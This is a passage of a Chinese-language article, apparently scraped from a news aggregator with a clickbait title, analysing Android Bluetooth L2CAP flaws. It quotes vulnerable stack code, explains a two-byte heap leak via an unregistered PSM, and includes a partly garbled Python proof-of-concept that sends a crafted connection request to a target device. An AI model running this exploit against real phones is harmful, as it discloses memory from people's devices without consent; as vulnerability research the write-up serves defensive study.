烟草味道|快速理解Android中的三个蓝牙漏洞( 二 )
void l2cu_reject_connection(tL2C_LCB* p_lcb, uint16_t remote_cid,uint8_t rem_id, uint16_t result) {[...]UINT16_TO_STREAM(p, 0); /* Local CID of 0*/UINT16_TO_STREAM(p, remote_cid);UINT16_TO_STREAM(p, result);UINT16_TO_STREAM(p, 0); /* Status of 0*/l2c_link_check_send_pkts(p_lcb, NULL, p_buf);}请注意 , 攻击者可以通过在特制的L2CAP数据包中提供未注册的协议/服务多路复用器(PSM)ID字段来完全影响l2cu_find_rcb_by_psm() , 以致于始终返回NULL(从而始终到达if分支) 。
另外 , 请注意 , 这种使用STREAM_TO_UINT16宏而不检查攻击者控制的数据包中是否剩余足够数据的不安全代码模式似乎已在process_l2cap_cmd()函数的各处使用 。
总结来说 , 过程如下图所示:
从堆栈上通过函数STREAM_TO_UINT16分别读取两字节到con_info.psm和rcid , con_info.psm再通过函数l2cu_find_rcd_by_psm函数得到p_rcb , 对p_rcb进行判断 , 如果p_rcb == NULL(可以通过提供未注册的协议/服务多路复用器ID字段来实现) , 会读取rcid等信息 。
如果 , 数据包中的数据在数据1..就已经结束 , 程序还是会将堆栈上将相邻两个字节的数据(也就是数据2..)读入到rcid , 最后发送给远程对等方 。 那么 , 最后整个攻击结果就是这里的内存泄漏了两个字节 。
Proof-of-Concept(概念验证)以下Python代码触发了该漏洞 , 并打印了从目标蓝牙设备的com.android.bluetooth守护程序堆泄漏的16位值 。
此Python代码使用Blueborne框架中的l2cap_infra包 。
用法:$ sudo python l2cap01.py。
例如:$ sudo python l2cap01.py hci0 00:11:22:33:44:55 。
【烟草味道|快速理解Android中的三个蓝牙漏洞】import osimport sysfrom l2cap_infra import *L2CAP_SIGNALLING_CID = 0x01L2CAP_CMD_CONN_REQ = 0x02def main(src_hci, dst_bdaddr):l2cap_loop, _ = create_l2cap_connection(src_hci, dst_bdaddr)# This will leak 2 bytes from the heap 这将从堆中泄漏2个字节print "Sending L2CAP_CMD_CONN_REQ in L2CAP connection..." #发送L2CAP连接中的L2CAP命令连接请求cmd_code = L2CAP_CMD_CONN_REQcmd_id = 0x41# not importantcmd_len = 0x00# bypasses this check at lines 296/297 of l2c_main.cc:p_next_cmd = p + cmd_len; / if (p_next_cmd > p_pkt_end) {non_existent_psm = 0x3333# Non-existent Protocol/Service Multiplexer id, so l2cu_find_rcb_by_psm() returns NULL and l2cu_reject_connection() is called 协议/服务多路复用器id不存在 , 因此l2cu_find_rcb_by_psm()返回NULL , 并调用l2cu_reject_connection()# here we use L2CAP_SIGNALLING_CID as cid, so l2c_rcv_acl_data() calls process_l2cap_cmd():#这里我们将L2CAP_signaling_CID用作CID , 因此l2c_rcv_acl_data()调用进程_L2CAP_cmd():# 170/* Send the data through the channel state machine 通过通道状态机发送数据*/# 171if (rcv_cid == L2CAP_SIGNALLING_CID) {# 172process_l2cap_cmd(p_lcb, p, l2cap_len);l2cap_loop.send(L2CAP_Hdr(cid=L2CAP_SIGNALLING_CID) / Raw(struct.pack('")else:if os.getuid():print "Error: This script must be run as root."else:main(*sys.argv[1:])漏洞2:Bluetooth L2CAP L2CAP_CMD_DISC_REQ Remote Memory Disclosure蓝牙L2CAP L2CAP_CMD_DISC_REQ远程内存泄露
简要通过将特制的L2CAP数据包发送到目标设备 , 蓝牙范围内的远程攻击者可以使用Android 蓝牙堆栈中的漏洞来泄露属于com.android.bluetooth守护程序堆的4个字节 。
推荐阅读
- 上海市嘉定区人民政府网站|【走向我们的小康生活】日揽300件的“快递一哥”,为了快速送货,他手绘了一张地图
- 上海嘉定|嘉定这8个受理点和受理中心,可申请居住证快速办理(附问答)
- 小郑杰西卡|上演快速瘦身大法,服了,22岁“北境女王”索菲产女后首次亮相
- 烹饪|泡发香菇时加一勺它,泡发的香菇味道更鲜,3分钟香菇全部泡发
- 关节骨头|上班久坐,休息刷手机,不小心含胸驼背,怎样快速唤醒挺拔身姿?
- 综艺节目|严敏新综艺开播,还是那个熟悉的味道,《极限挑战》真的不该放他
- 美军|美媒:中国空军快速发展,五角大楼称美军面临巨大“威胁”
- 环球时评|香港一巴士司机快速行驶贴近执勤警员被截停,因危险驾驶罪被捕
- 青岛警方通报!东西快速路抢道引冲突,出租车司机捅伤网约车司机逃离
- 广东省烟草局局长刘依平表示将安全工作尽在掌握中,推动安全生产管理 - 向“大安全”迈进